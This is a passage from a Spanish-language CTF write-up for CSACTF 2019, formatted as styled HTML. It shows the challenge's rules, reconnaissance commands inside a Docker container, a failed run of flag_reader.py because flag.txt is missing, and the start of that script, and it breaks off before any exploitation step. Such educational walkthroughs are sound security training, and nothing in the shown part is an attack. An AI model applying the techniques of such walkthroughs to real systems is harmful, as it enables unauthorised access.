pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">_________ _________ _____ _______________________________</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">\_ ___ \ / _____/ / _ \ \_ ___ \__ ___/\_ _____/</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">/ \ \/ \_____ \ / /_\ \/ \ \/ | | | __) </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">\ \____/ \/ | \ \____| | | \ </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> \______ /_______ /\____|__ /\______ /|____| \___ / </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> \/ \/ \/ \/ \/ </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Welcome to CSACTF 2019!</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">If you find any problems, please report to admin.</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-[ Rule ]-</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> A few rules before you get started:</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> + don'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">t leave orphan processes running</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> + don</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'t leave exploit-files laying around</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> + don'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">t annoy other players</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> + don</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'t share passwords/solutions</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> + last but not least, don'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">t spoil the fun!</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Have fun!</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> - Blue</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ whoami</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">pwd</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">/home/user</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ id</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">uid=1000(user) gid=1000(user) groups=1000(user)</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nos encontramos ante un contenedor de Docker en una VM con OS Ubuntu en GCP . Y descubrimos un script llamado flag_reader.py en el directorio ~/home/user/</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ ls -la</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">total 44</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">drwxr-xr-x 1 user user 4096 Apr 25 17:48 .</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">drwxr-xr-x 1 root root 4096 Apr 22 20:12 ..</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-r--r-- 1 user user 220 Aug 31 2015 .bash_logout</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-r--r-- 1 user user 3796 Apr 25 17:47 .bashrc</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">drwx------ 2 user user 4096 Apr 25 17:48 .cache</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-r--r-- 1 user user 655 May 16 2017 .profile</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-rw-r-- 1 user user 0 Apr 25 17:48 ahahaha</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rwxrwxr-x 1 root root 267 Apr 22 20:09 flag_reader.py</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-rw-r-- 1 root root 40 Apr 22 19:25 readme.txt</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">-rw-r--r-- 1 user user 19 Apr 25 17:47 temp.txt</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ uname -a</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Linux 4ccc23ce0216 4.15.0-1029-gcp </span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#31-Ubuntu SMP Thu Mar 21 09:40:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Observamos que el script necesita de la existencia de un archivo llamado flag.txt que ha sido eliminado.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ ./flag_reader.py </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Traceback (most recent call last):</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> File </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"./flag_reader.py"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, line 5, </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> <module></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> f = open(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'flag.txt'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'r'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">IOError: [Errno 2] No such file or directory: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'flag.txt'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ cat flag_reader.py </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#!/usr/bin/python</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import time</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import os</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">f = open(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'flag.txt'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'r'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: 